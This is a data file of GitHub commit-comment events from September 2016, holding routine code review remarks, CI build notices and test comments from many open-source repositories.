{"id":"4569272245","type":"CommitCommentEvent","actor":{"login":"bjfish"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19039943,"position":6,"line":902,"path":"truffle/src/main/java/org/jruby/truffle/core/kernel/KernelNodes.java","commit_id":"7ddb76a5e96ccf677241bf605da7ee8ac403f9ed","created_at":"2016-09-15T16:43:46Z","updated_at":"2016-09-15T16:43:46Z","body":"Fixed: ac60bbe6ed0832bd8ab5494ae82a024449f05c59"}},"created_at":"2016-09-15T16:43:46Z"}
{"id":"4569272688","type":"CommitCommentEvent","actor":{"login":"WilliamSWoodruff"},"repo":{"name":"WilliamSWoodruff/mail-licker"},"payload":{"comment":{"id":19039945,"position":8,"line":15,"path":"lib/index.js","commit_id":"7159a1233298c6f23f1f37f729ff0929bf9c3a99","created_at":"2016-09-15T16:43:51Z","updated_at":"2016-09-15T16:43:51Z","body":"Ok, it was weird I couldn't get it to work with the module.exports in Node v6. wasn't respecting the prototype mutations"}},"created_at":"2016-09-15T16:43:51Z"}
{"id":"4569273058","type":"CommitCommentEvent","actor":{"login":"laddawan013"},"repo":{"name":"laddawan013/nOoMay"},"payload":{"comment":{"id":19039947,"position":null,"line":null,"path":null,"commit_id":"7d6cbd697ab7e244c26bf49222f34865866bfc96","created_at":"2016-09-15T16:43:54Z","updated_at":"2016-09-15T16:43:54Z","body":"\r\nhi \r\n\r\n"}},"created_at":"2016-09-15T16:43:54Z"}
{"id":"4569274687","type":"CommitCommentEvent","actor":{"login":"jaredpalmer"},"repo":{"name":"jaredpalmer/react-production-starter"},"payload":{"comment":{"id":19039955,"position":null,"line":null,"path":null,"commit_id":"384c7dd4cb0b0f3545d0b9fc04ead0f0846f60a7","created_at":"2016-09-15T16:44:13Z","updated_at":"2016-09-15T16:44:13Z","body":"This is ugly. However big refactor coming soonsies."}},"created_at":"2016-09-15T16:44:13Z"}
{"id":"4569275245","type":"CommitCommentEvent","actor":{"login":"timruffles"},"repo":{"name":"cubik-oss/redux-reducer-effects"},"payload":{"comment":{"id":19039956,"position":152,"line":67,"path":"src/enhancer.ts","commit_id":"249c75dcb924e5c599012b03773cbdd1c1fc2267","created_at":"2016-09-15T16:44:19Z","updated_at":"2016-09-15T16:44:19Z","body":"is hasChanged used?"}},"created_at":"2016-09-15T16:44:19Z"}
{"id":"4569277978","type":"CommitCommentEvent","actor":{"login":"h0tbird"},"repo":{"name":"zefciu/kubernetes"},"payload":{"comment":{"id":19039961,"position":null,"line":null,"path":null,"commit_id":"22eb5773500f60d134d0038a87853d685430573a","created_at":"2016-09-15T16:44:48Z","updated_at":"2016-09-15T16:44:48Z","body":"This breaks building kubernetes inside Alpine Linux:\r\n\r\n```\r\ngrep: unrecognized option: color=never\r\nBusyBox v1.24.2 (2016-06-23 08:49:16 GMT) multi-call binary.\r\n\r\nUsage: grep [-HhnlLoqvsriwFE] [-m N] [-A/B/C N] PATTERN/-e PATTERN.../-f FILE [FILE]...\r\n```"}},"created_at":"2016-09-15T16:44:48Z"}
{"id":"4569279257","type":"CommitCommentEvent","actor":{"login":"DjWarmonger"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":19039964,"position":null,"line":null,"path":null,"commit_id":"fdca75b4b0c134ea41f1c819f83bf3c38eceb889","created_at":"2016-09-15T16:45:03Z","updated_at":"2016-09-15T16:45:03Z","body":"What does \"L10n \" even mean?"}},"created_at":"2016-09-15T16:45:03Z"}
{"id":"4569279551","type":"CommitCommentEvent","actor":{"login":"islemaster"},"repo":{"name":"code-dot-org/code-dot-org"},"payload":{"comment":{"id":19039966,"position":17,"line":29,"path":"apps/src/applab/dataBrowser/EditTableRow.jsx","commit_id":"3dee3c851d432369e9325c80c72589d86d9c4304","created_at":"2016-09-15T16:45:08Z","updated_at":"2016-09-15T16:45:08Z","body":"I'm... surprised that this isn't implicit.  If neither props nor state changed, what was triggering the re-render of this component?"}},"created_at":"2016-09-15T16:45:08Z"}
{"id":"4569279839","type":"CommitCommentEvent","actor":{"login":"devinivy"},"repo":{"name":"WilliamSWoodruff/mail-licker"},"payload":{"comment":{"id":19039969,"position":8,"line":15,"path":"lib/index.js","commit_id":"7159a1233298c6f23f1f37f729ff0929bf9c3a99","created_at":"2016-09-15T16:45:12Z","updated_at":"2016-09-15T16:45:12Z","body":"It's because of the arrows!"}},"created_at":"2016-09-15T16:45:12Z"}
{"id":"4569279942","type":"CommitCommentEvent","actor":{"login":"jbclements"},"repo":{"name":"racket/racket"},"payload":{"comment":{"id":19039970,"position":15,"line":314,"path":"pkgs/racket-doc/xml/xml.scrbl","commit_id":"38622ce2767a36920c34b4b196d49fbbcca1b41d","created_at":"2016-09-15T16:45:12Z","updated_at":"2016-09-15T16:45:12Z","body":"\n> On Sep 15, 2016, at 9:27 AM, Sam Tobin-Hochstadt <notifications@github.com> wrote:\n> \n> In fact, looking at the dependencies, racket-doc already transitively depends on web-server-doc.\n\nIf you’ve got this paged in, maybe you could add the for-label declaration?\n\nJohn\n\n\n"}},"created_at":"2016-09-15T16:45:12Z"}
{"id":"4569283549","type":"CommitCommentEvent","actor":{"login":"WilliamSWoodruff"},"repo":{"name":"WilliamSWoodruff/mail-licker"},"payload":{"comment":{"id":19039979,"position":8,"line":15,"path":"lib/index.js","commit_id":"7159a1233298c6f23f1f37f729ff0929bf9c3a99","created_at":"2016-09-15T16:45:50Z","updated_at":"2016-09-15T16:45:50Z","body":"Oh I didn't realize how destructive arrow syntax was"}},"created_at":"2016-09-15T16:45:50Z"}
{"id":"4569286461","type":"CommitCommentEvent","actor":{"login":"mentor-kk"},"repo":{"name":"agims7/test"},"payload":{"comment":{"id":19039985,"position":21,"line":20,"path":"index.html","commit_id":"8d22f39c9b7b8b748b51a0d8b7827ef20a311ea1","created_at":"2016-09-15T16:46:23Z","updated_at":"2016-09-15T16:46:23Z","body":"po co ten `li`"}},"created_at":"2016-09-15T16:46:23Z"}
{"id":"4569295559","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039998,"position":107,"line":107,"path":"server/app/routes/orders/index.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:48:07Z","updated_at":"2016-09-15T16:48:07Z","body":"maybe use model#destroy instead of find, then destroy."}},"created_at":"2016-09-15T16:48:07Z"}
{"id":"4569296097","type":"CommitCommentEvent","actor":{"login":"ss-plus"},"repo":{"name":"ss-plus/dns-socks-proxy"},"payload":{"comment":{"id":19040001,"position":null,"line":null,"path":null,"commit_id":"44e828bd3a052da60e9d0a97ee6b74b3843fd210","created_at":"2016-09-15T16:48:13Z","updated_at":"2016-09-15T16:48:13Z","body":"Revise default port number of socks proxy."}},"created_at":"2016-09-15T16:48:13Z"}
{"id":"4569297774","type":"CommitCommentEvent","actor":{"login":"acorncom"},"repo":{"name":"samselikoff/ember-cli-mirage"},"payload":{"comment":{"id":19040004,"position":null,"line":null,"path":null,"commit_id":"ef5744a0db17dba87831c1ac9cfd0f4695cca865","created_at":"2016-09-15T16:48:32Z","updated_at":"2016-09-15T16:48:32Z","body":"@samselikoff 👏 "}},"created_at":"2016-09-15T16:48:32Z"}
{"id":"4569300596","type":"CommitCommentEvent","actor":{"login":"traversaro"},"repo":{"name":"robotology/yarp-wholebodyinterface"},"payload":{"comment":{"id":19040007,"position":null,"line":null,"path":null,"commit_id":"d13d379d457a19e04489751c178904c800ce115d","created_at":"2016-09-15T16:49:04Z","updated_at":"2016-09-15T16:49:04Z","body":"@DanielePucci @gabrielenava  Just for reference: those values are not parsed by anything. "}},"created_at":"2016-09-15T16:49:04Z"}
{"id":"4569301206","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19040009,"position":null,"line":null,"path":null,"commit_id":"e9494152e977644bec904d68abc52c1067e8de48","created_at":"2016-09-15T16:49:12Z","updated_at":"2016-09-15T16:49:12Z","body":"versionNumbers (mitchute) - i386-Windows-7-VisualStudio-12: OK (2336 of 2336 tests passed, 21 test warnings)\n\n * 21 tests had: EIO diffs.\n * 21 tests had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9494152e977644bec904d68abc52c1067e8de48-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9494152e977644bec904d68abc52c1067e8de48-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-15T16:49:12Z"}
{"id":"4569302373","type":"CommitCommentEvent","actor":{"login":"ncla"},"repo":{"name":"jung35/VacStatus"},"payload":{"comment":{"id":19040013,"position":null,"line":null,"path":null,"commit_id":"220c3a372d33b1649d6c3129910b6c1ec4ed5c89","created_at":"2016-09-15T16:49:22Z","updated_at":"2016-09-15T16:49:22Z","body":"Dump the DB tables then."}},"created_at":"2016-09-15T16:49:22Z"}
{"id":"4569303893","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19040017,"position":25,"line":25,"path":"server/db/index.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:49:40Z","updated_at":"2016-09-15T16:49:40Z","body":"May want to also do `Order.belongsTo(User)`"}},"created_at":"2016-09-15T16:49:40Z"}
{"id":"4569314305","type":"CommitCommentEvent","actor":{"login":"jdonaldson"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19040076,"position":null,"line":null,"path":null,"commit_id":"7f0801c4a442a03cd027937f8e90393329a38642","created_at":"2016-09-15T16:51:38Z","updated_at":"2016-09-15T16:51:38Z","body":"yeesh.  I see now.  this is tricky.  let me try that."}},"created_at":"2016-09-15T16:51:38Z"}
{"id":"4569314411","type":"CommitCommentEvent","actor":{"login":"yossigil"},"repo":{"name":"SpartanRefactoring/Spartanizer"},"payload":{"comment":{"id":19040077,"position":null,"line":null,"path":null,"commit_id":"579c135133c0585f50c696809f67807a971171f6","created_at":"2016-09-15T16:51:39Z","updated_at":"2016-09-15T16:51:39Z","body":":100: "}},"created_at":"2016-09-15T16:51:39Z"}
{"id":"4569316231","type":"CommitCommentEvent","actor":{"login":"jf990"},"repo":{"name":"Esri/developer-support"},"payload":{"comment":{"id":19040082,"position":null,"line":null,"path":null,"commit_id":"6344e6756d69eb3ccafd52e7ad8eb81192713c16","created_at":"2016-09-15T16:51:59Z","updated_at":"2016-09-15T16:51:59Z","body":"Github Desktop, both OS X and Windows, has the Pull Request button, allows you to open a new pull request when commits are pending, or view your open pull request\r\n\r\n![image](https://cloud.githubusercontent.com/assets/13524488/18558929/e30ba746-7b29-11e6-8729-acb08d4d1610.png)\r\n"}},"created_at":"2016-09-15T16:51:59Z"}
{"id":"4569319183","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"Jinmo/pcap_test"},"payload":{"comment":{"id":19040089,"position":2,"line":2,"path":"pcap_test.h","commit_id":"ea6f6b384bd0b37375e4b6ecae21ccd60d41a034","created_at":"2016-09-15T16:52:25Z","updated_at":"2016-09-15T16:52:25Z","body":"\"pragma pack(1)\" is not recommended in C/C++ code. Guess the following code result.\r\n\r\nobj.h\r\n```c++\r\n#pragma once\r\n#include <iostream>\r\n\r\nstruct Obj\r\n{\r\n  char ch;\r\n  int i;\r\n};\r\n\r\nvoid writeSize();\r\n```\r\n\r\nobj.cpp\r\n```c++\r\n#include \"obj.h\"\r\n\r\nvoid writeSize() {\r\n  std::cout << sizeof(Obj) << std::endl;\r\n}\r\n```\r\n\r\nmain.cpp\r\n```c++\r\n#pragma pack(1)\r\n#include \"obj.h\"\r\n\r\nint main()\r\n{\r\n  writeSize();\r\n  std::cout << sizeof(Obj) << std::endl;\r\n  return 0;\r\n}\r\n```\r\n\r\nYou'd better use \"#pragma pack(push, 1)\" and \"#pragma pack(pop)\" before and after byte alignment is important.\r\n"}},"created_at":"2016-09-15T16:52:25Z"}
{"id":"4569324439","type":"CommitCommentEvent","actor":{"login":"shenguanyi"},"repo":{"name":"shenguanyi/mydemo"},"payload":{"comment":{"id":19040103,"position":null,"line":null,"path":null,"commit_id":"4a2c8241a7375ad40b445ff28835f6c437421a2b","created_at":"2016-09-15T16:53:22Z","updated_at":"2016-09-15T16:53:22Z","body":" 再加点"}},"created_at":"2016-09-15T16:53:22Z"}
{"id":"4569325717","type":"CommitCommentEvent","actor":{"login":"CCYD"},"repo":{"name":"ext0/SaneWeb"},"payload":{"comment":{"id":19040104,"position":null,"line":null,"path":null,"commit_id":"c57807d31a45c643bca8805e34194533d1558d51","created_at":"2016-09-15T16:53:37Z","updated_at":"2016-09-15T16:53:37Z","body":"damn alpacas"}},"created_at":"2016-09-15T16:53:37Z"}
{"id":"4569327431","type":"CommitCommentEvent","actor":{"login":"yarneo"},"repo":{"name":"mixpanel/mixpanel-swift"},"payload":{"comment":{"id":19040106,"position":null,"line":null,"path":null,"commit_id":"d7e59bf251ae18fa794451321eead12741feb4ab","created_at":"2016-09-15T16:53:59Z","updated_at":"2016-09-15T16:53:59Z","body":"@lfarah Will do today!"}},"created_at":"2016-09-15T16:53:59Z"}
{"id":"4569329145","type":"CommitCommentEvent","actor":{"login":"SwathiVarkala"},"repo":{"name":"Bahmni/openmrs-module-bahmniapps"},"payload":{"comment":{"id":19040110,"position":null,"line":null,"path":null,"commit_id":"fc827d27dce6812f2cd25a697e056ee9120554a5","created_at":"2016-09-15T16:54:20Z","updated_at":"2016-09-15T16:54:20Z","body":"@sourava @vikashgupta2000 : Is this a consolidated commit of 2,3 commits on master branch? In this commit do we have any piece of code which is not present in master branch?"}},"created_at":"2016-09-15T16:54:20Z"}
{"id":"4569330048","type":"CommitCommentEvent","actor":{"login":"Ngawinganjukwidarto"},"repo":{"name":"git/git"},"payload":{"comment":{"id":19040114,"position":null,"line":null,"path":null,"commit_id":"c0f19bf3b9c42036722396ee26d2c173d6abf761","created_at":"2016-09-15T16:54:28Z","updated_at":"2016-09-15T16:54:28Z","body":"On c0f19bf"}},"created_at":"2016-09-15T16:54:28Z"}
{"id":"4569331900","type":"CommitCommentEvent","actor":{"login":"melix"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":19040118,"position":31,"line":31,"path":"subprojects/core/src/main/java/org/gradle/api/execution/TaskOutputCacheListener.java","commit_id":"0c3a8747416a7c8b8bf2fef07119bf4487a2e8ec","created_at":"2016-09-15T16:54:49Z","updated_at":"2016-09-15T16:54:49Z","body":"Should be `Called whenever a task couldn't be cached`"}},"created_at":"2016-09-15T16:54:49Z"}
{"id":"4569333133","type":"CommitCommentEvent","actor":{"login":"joseluizcoe"},"repo":{"name":"kytos/website"},"payload":{"comment":{"id":19040121,"position":null,"line":null,"path":null,"commit_id":"fd12d351c73696ef03f384a7cc81545a0bac3dc2","created_at":"2016-09-15T16:55:04Z","updated_at":"2016-09-15T16:55:04Z","body":"Preview - Napps list page:\r\n![list-page](https://cloud.githubusercontent.com/assets/32010/18559059/f3f4e3b6-7b4b-11e6-814a-115fd1534509.png)\r\n"}},"created_at":"2016-09-15T16:55:04Z"}
{"id":"4569337754","type":"CommitCommentEvent","actor":{"login":"lucko"},"repo":{"name":"lucko/FactionsFramework"},"payload":{"comment":{"id":19040129,"position":null,"line":null,"path":null,"commit_id":"d5411c5d593190832233cf3367919742e285b675","created_at":"2016-09-15T16:55:54Z","updated_at":"2016-09-15T16:55:54Z","body":"Yeah, I understand. \r\n\r\nMy thinking was just to minimize the no. of dependencies for the end user to have to install. In hindsight, maybe a bit silly. It was somewhat rushed to be honest.\r\n\r\nThe points you raise in the wiki article I somewhat agree with. I still think that just a collection of versioned classes strapped to an API is much easier for everyone. I understand the updates bit, but that's just a versioning thing. It's the same for any library.\r\n\r\nI knew that it wasn't your intention to encourage shading, and I made a bit of a mess of the code in my fork. Didn't PR for that reason.\r\n\r\nI'm using it for https://github.com/lucko/ConditionalPerms\r\nI just wanted a lazy way to hook with Factions, because, umm, I'm lazy.\r\n\r\nGreat resource btw. Love the concept, super useful. :smile:"}},"created_at":"2016-09-15T16:55:54Z"}
{"id":"4569337844","type":"CommitCommentEvent","actor":{"login":"rkh"},"repo":{"name":"travis-ci/travis.rb"},"payload":{"comment":{"id":19040130,"position":12,"line":95,"path":"lib/travis/client/methods.rb","commit_id":"fac4e62024bb5b72fe81da867173598d84345b62","created_at":"2016-09-15T16:55:55Z","updated_at":"2016-09-15T16:55:55Z","body":"calls out to https://github.com/travis-ci/travis-api/blob/master/lib/travis/api/app/endpoint/lint.rb"}},"created_at":"2016-09-15T16:55:55Z"}
{"id":"4569340477","type":"CommitCommentEvent","actor":{"login":"DieHertz"},"repo":{"name":"betaflight/betaflight"},"payload":{"comment":{"id":19040135,"position":7,"line":87,"path":"src/main/drivers/serial_usb_vcp_hal.c","commit_id":"a78aab94bb6c857bd061f66f1e91e5462124d774","created_at":"2016-09-15T16:56:24Z","updated_at":"2016-09-15T16:56:24Z","body":"What is the point of declaring this variable in larger scope? Stack layout is determined at compile-time, having this variable inside `while` is cleaner."}},"created_at":"2016-09-15T16:56:24Z"}
{"id":"4569343256","type":"CommitCommentEvent","actor":{"login":"crohr"},"repo":{"name":"finnlabs/addon-repositories"},"payload":{"comment":{"id":19040141,"position":null,"line":null,"path":null,"commit_id":"068e8a217299759a142048ab61d6f05ce66c78f7","created_at":"2016-09-15T16:56:54Z","updated_at":"2016-09-15T16:56:54Z","body":"@oliverguenther This actually breaks installations on CentOS 6 with the following error in the apache logs:\r\n```\r\n[Thu Sep 15 16:34:56 2016] [error] [client 46.105.125.189] failed to resolve handler `Apache2::Reload': Can't locate Apache2/Reload.pm in @INC (@INC contains: /usr/lib64/perl5/vendor_perl /usr/local/lib64/perl5 /usr/local/share/perl5 /usr/lib64/perl5/vendor_perl /usr/share/perl5/vendor_perl /usr/lib64/perl5 /usr/share/perl5 . /etc/httpd) at (eval 59) line 3.\\n\r\n```\r\n\r\nIs there any chance to make it optional?"}},"created_at":"2016-09-15T16:56:54Z"}
{"id":"4569346640","type":"CommitCommentEvent","actor":{"login":"andytuba"},"repo":{"name":"AdguardTeam/AdguardBrowserExtension"},"payload":{"comment":{"id":19040147,"position":null,"line":null,"path":null,"commit_id":"b9c0f8e367b3e135ca68c25ee37b49d7abf9e646","created_at":"2016-09-15T16:57:30Z","updated_at":"2016-09-15T16:57:30Z","body":"Thanks a lot for this compatibility fix and for /u/avatar_adg to responding to users reporting the bug to /r/RESissues!"}},"created_at":"2016-09-15T16:57:30Z"}
{"id":"4569349440","type":"CommitCommentEvent","actor":{"login":"SwathiVarkala"},"repo":{"name":"Bahmni/openmrs-module-bahmniapps"},"payload":{"comment":{"id":19040158,"position":null,"line":null,"path":null,"commit_id":"0311d98ae8315f6c29b3587a78f36b286d35358e","created_at":"2016-09-15T16:58:05Z","updated_at":"2016-09-15T16:58:05Z","body":"@Bijayini , @sourava , @vikashgupta2000 : Shouldn't we have this commit in master also. We need to cherrypick the changes we do to endtb-release-0.84 to master."}},"created_at":"2016-09-15T16:58:05Z"}
{"id":"4569349999","type":"CommitCommentEvent","actor":{"login":"lm200560611"},"repo":{"name":"lm200560611/github"},"payload":{"comment":{"id":19040161,"position":3,"line":3,"path":"a.txt","commit_id":"65fdb21da1b77661ab6c2f4729c18856ec054aab","created_at":"2016-09-15T16:58:12Z","updated_at":"2016-09-15T16:58:12Z","body":"dsdsdsds"}},"created_at":"2016-09-15T16:58:12Z"}
{"id":"4569350791","type":"CommitCommentEvent","actor":{"login":"DarthDestroyer"},"repo":{"name":"openhardwaremonitor/openhardwaremonitor"},"payload":{"comment":{"id":19040164,"position":null,"line":null,"path":null,"commit_id":"f89eb0e578817ec3de6a5d9bcf7177358a3de8b6","created_at":"2016-09-15T16:58:20Z","updated_at":"2016-09-15T16:58:20Z","body":"You are a little bit late, hm?!\r\n\r\nLatest Version is 7.1.5... Have you tried it?"}},"created_at":"2016-09-15T16:58:20Z"}
{"id":"4569352284","type":"CommitCommentEvent","actor":{"login":"shenguanyi"},"repo":{"name":"shenguanyi/mydemo"},"payload":{"comment":{"id":19040168,"position":2,"line":2,"path":"README.md","commit_id":"fe79d7847111343e454a1fe62181a25e945b13ee","created_at":"2016-09-15T16:58:37Z","updated_at":"2016-09-15T16:58:37Z","body":"hhh 方及阿胶颗粒"}},"created_at":"2016-09-15T16:58:37Z"}
{"id":"4569355900","type":"CommitCommentEvent","actor":{"login":"diraol"},"repo":{"name":"kytos/website"},"payload":{"comment":{"id":19040178,"position":null,"line":null,"path":null,"commit_id":"fd12d351c73696ef03f384a7cc81545a0bac3dc2","created_at":"2016-09-15T16:59:18Z","updated_at":"2016-09-15T16:59:18Z","body":"@beraldoleal I think that \"Featured\", \"Most popular\" and \"Top Rated\" are types of \"Sort by\", not 'filters'. If so, I think that is better to remove the left 'block' with that options and add them on the 'sort by' select."}},"created_at":"2016-09-15T16:59:18Z"}
{"id":"4569357444","type":"CommitCommentEvent","actor":{"login":"SwathiVarkala"},"repo":{"name":"Bahmni/openmrs-module-bahmniapps"},"payload":{"comment":{"id":19040182,"position":null,"line":null,"path":null,"commit_id":"b08c83bb797e2d074abc6f06eb000d9d1d93bcf5","created_at":"2016-09-15T16:59:34Z","updated_at":"2016-09-15T16:59:34Z","body":"@Bijayini , @sourava , @vikashgupta2000 : We need to cherrypick the changes we do to endtb-release-0.84 to master."}},"created_at":"2016-09-15T16:59:34Z"}
{"id":"4569359115","type":"CommitCommentEvent","actor":{"login":"jung35"},"repo":{"name":"jung35/VacStatus"},"payload":{"comment":{"id":19040192,"position":null,"line":null,"path":null,"commit_id":"220c3a372d33b1649d6c3129910b6c1ec4ed5c89","created_at":"2016-09-15T16:59:52Z","updated_at":"2016-09-15T16:59:52Z","body":"That would be going against privacy policy i made i think.\n\nOn Sep 15, 2016 11:49 AM, \"ncla\" <notifications@github.com> wrote:\n\n> Dump the DB tables then.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jung35/VacStatus/commit/220c3a372d33b1649d6c3129910b6c1ec4ed5c89#commitcomment-19040013>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AApJDkkx-w7ZyXFw5GQnhcCgHNL6jeBhks5qqXcSgaJpZM4JrFAC>\n> .\n>\n"}},"created_at":"2016-09-15T16:59:52Z"}
{"id":"4569364589","type":"CommitCommentEvent","actor":{"login":"AustinTamb"},"repo":{"name":"AustinTamb/hello-world"},"payload":{"comment":{"id":19040204,"position":null,"line":null,"path":null,"commit_id":"115fd8d306ee782aee3b93ee209bd30d18bc213e","created_at":"2016-09-15T17:00:50Z","updated_at":"2016-09-15T17:00:50Z","body":"stuff"}},"created_at":"2016-09-15T17:00:50Z"}
{"id":"4569366933","type":"CommitCommentEvent","actor":{"login":"drcarltonesapp"},"repo":{"name":"drcarltonesapp/machinelearning"},"payload":{"comment":{"id":19040211,"position":null,"line":null,"path":null,"commit_id":"432c5080f626a5844c81e8d62e8e44431fb1a09e","created_at":"2016-09-15T17:01:17Z","updated_at":"2016-09-15T17:01:17Z","body":"Use as sample code for deploying ML algorithms"}},"created_at":"2016-09-15T17:01:17Z"}
{"id":"4569367250","type":"CommitCommentEvent","actor":{"login":"tsapa44"},"repo":{"name":"tsapa44/test"},"payload":{"comment":{"id":19040212,"position":null,"line":null,"path":null,"commit_id":"04d7481252bcbc900c30f7c462821e22e4cdb2dc","created_at":"2016-09-15T17:01:20Z","updated_at":"2016-09-15T17:01:20Z","body":"TeamCity test :: test [Build 18](http://ci.lemmew.com:8111/viewLog.html?buildId=1491&buildTypeId=Test_Test) is now running\n"}},"created_at":"2016-09-15T17:01:20Z"}
{"id":"4569367674","type":"CommitCommentEvent","actor":{"login":"tsapa44"},"repo":{"name":"tsapa44/test"},"payload":{"comment":{"id":19040213,"position":null,"line":null,"path":null,"commit_id":"04d7481252bcbc900c30f7c462821e22e4cdb2dc","created_at":"2016-09-15T17:01:25Z","updated_at":"2016-09-15T17:01:25Z","body":"TeamCity test :: test [Build 18](http://ci.lemmew.com:8111/viewLog.html?buildId=1491&buildTypeId=Test_Test) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:04"}},"created_at":"2016-09-15T17:01:25Z"}
{"id":"4569367806","type":"CommitCommentEvent","actor":{"login":"AustinTamb"},"repo":{"name":"AustinTamb/hello-world"},"payload":{"comment":{"id":19040214,"position":4,"line":2,"path":"README.md","commit_id":"115fd8d306ee782aee3b93ee209bd30d18bc213e","created_at":"2016-09-15T17:01:26Z","updated_at":"2016-09-15T17:01:26Z","body":"Updated stuff"}},"created_at":"2016-09-15T17:01:26Z"}
{"id":"4569368362","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19040218,"position":null,"line":null,"path":null,"commit_id":"7f0801c4a442a03cd027937f8e90393329a38642","created_at":"2016-09-15T17:01:32Z","updated_at":"2016-09-15T17:01:32Z","body":"Don't you want to generate the boxing unless the call is in `gen_block_element`?\r\n\r\nP.S.: `mk_mr_box` sounds adorable."}},"created_at":"2016-09-15T17:01:32Z"}
{"id":"4569368438","type":"CommitCommentEvent","actor":{"login":"AustinTamb"},"repo":{"name":"AustinTamb/hello-world"},"payload":{"comment":{"id":19040219,"position":null,"line":null,"path":null,"commit_id":"115fd8d306ee782aee3b93ee209bd30d18bc213e","created_at":"2016-09-15T17:01:34Z","updated_at":"2016-09-15T17:01:34Z","body":"mkay"}},"created_at":"2016-09-15T17:01:34Z"}
{"id":"4569368591","type":"CommitCommentEvent","actor":{"login":"ss-plus"},"repo":{"name":"ss-plus/dns-socks-proxy"},"payload":{"comment":{"id":19040220,"position":null,"line":null,"path":null,"commit_id":"ae70e0ffcc74321a4acb9c51eac0516ff239b75f","created_at":"2016-09-15T17:01:35Z","updated_at":"2016-09-15T17:01:35Z","body":"Revise default port number of socks proxy."}},"created_at":"2016-09-15T17:01:35Z"}
{"id":"4569369339","type":"CommitCommentEvent","actor":{"login":"comedinha"},"repo":{"name":"otland/forgottenserver"},"payload":{"comment":{"id":19040223,"position":7,"line":75,"path":"src/condition.h","commit_id":"33d074fe1cb28d7f094e0e6896ada65d9cd472a2","created_at":"2016-09-15T17:01:43Z","updated_at":"2016-09-15T17:01:43Z","body":"tab condition type"}},"created_at":"2016-09-15T17:01:43Z"}
{"id":"4569371121","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"jcalovski/Stockfish"},"payload":{"comment":{"id":19040228,"position":null,"line":null,"path":null,"commit_id":"0f5fd2add8c0d5ceec7689b7ecb2015fb2b92345","created_at":"2016-09-15T17:02:03Z","updated_at":"2016-09-15T17:02:03Z","body":"(or total number of pawns that support blocked pawns...)"}},"created_at":"2016-09-15T17:02:03Z"}
{"id":"4569371509","type":"CommitCommentEvent","actor":{"login":"dfernandez4"},"repo":{"name":"dfernandez4/test"},"payload":{"comment":{"id":19040229,"position":null,"line":null,"path":null,"commit_id":"1dd067f7e3efd3375b21ecc1b679dcbcc27d51e9","created_at":"2016-09-15T17:02:10Z","updated_at":"2016-09-15T17:02:10Z","body":"Added functionality to see if the string matches that regular expression "}},"created_at":"2016-09-15T17:02:10Z"}
{"id":"4569376426","type":"CommitCommentEvent","actor":{"login":"jdonaldson"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19040238,"position":null,"line":null,"path":null,"commit_id":"7f0801c4a442a03cd027937f8e90393329a38642","created_at":"2016-09-15T17:03:01Z","updated_at":"2016-09-15T17:03:01Z","body":"\r\n![](https://s-media-cache-ak0.pinimg.com/236x/5f/02/1d/5f021dab4076cc81186369d60c7b2164.jpg)\r\n\r\n"}},"created_at":"2016-09-15T17:03:01Z"}
{"id":"4569376846","type":"CommitCommentEvent","actor":{"login":"murone"},"repo":{"name":"PredixDev/px-typography-design"},"payload":{"comment":{"id":19040239,"position":null,"line":null,"path":null,"commit_id":"17926bfda515de6a78550d405e3fcf9bd1ca3984","created_at":"2016-09-15T17:03:07Z","updated_at":"2016-09-15T17:03:07Z","body":"Awesome, thanks!"}},"created_at":"2016-09-15T17:03:07Z"}
{"id":"4569380195","type":"CommitCommentEvent","actor":{"login":"comedinha"},"repo":{"name":"otland/forgottenserver"},"payload":{"comment":{"id":19040249,"position":55,"line":181,"path":"src/condition.h","commit_id":"33d074fe1cb28d7f094e0e6896ada65d9cd472a2","created_at":"2016-09-15T17:03:45Z","updated_at":"2016-09-15T17:03:45Z","body":"space?"}},"created_at":"2016-09-15T17:03:45Z"}
{"id":"4569380564","type":"CommitCommentEvent","actor":{"login":"Becold"},"repo":{"name":"leek-wars/leek-wars-client"},"payload":{"comment":{"id":19040251,"position":null,"line":null,"path":null,"commit_id":"feff6f79509affb598d8741bac8cc1555a115c02","created_at":"2016-09-15T17:03:49Z","updated_at":"2016-09-15T17:03:49Z","body":"This need to be updated too : https://github.com/leek-wars/leek-wars-client/blame/master/README.md#L21"}},"created_at":"2016-09-15T17:03:49Z"}
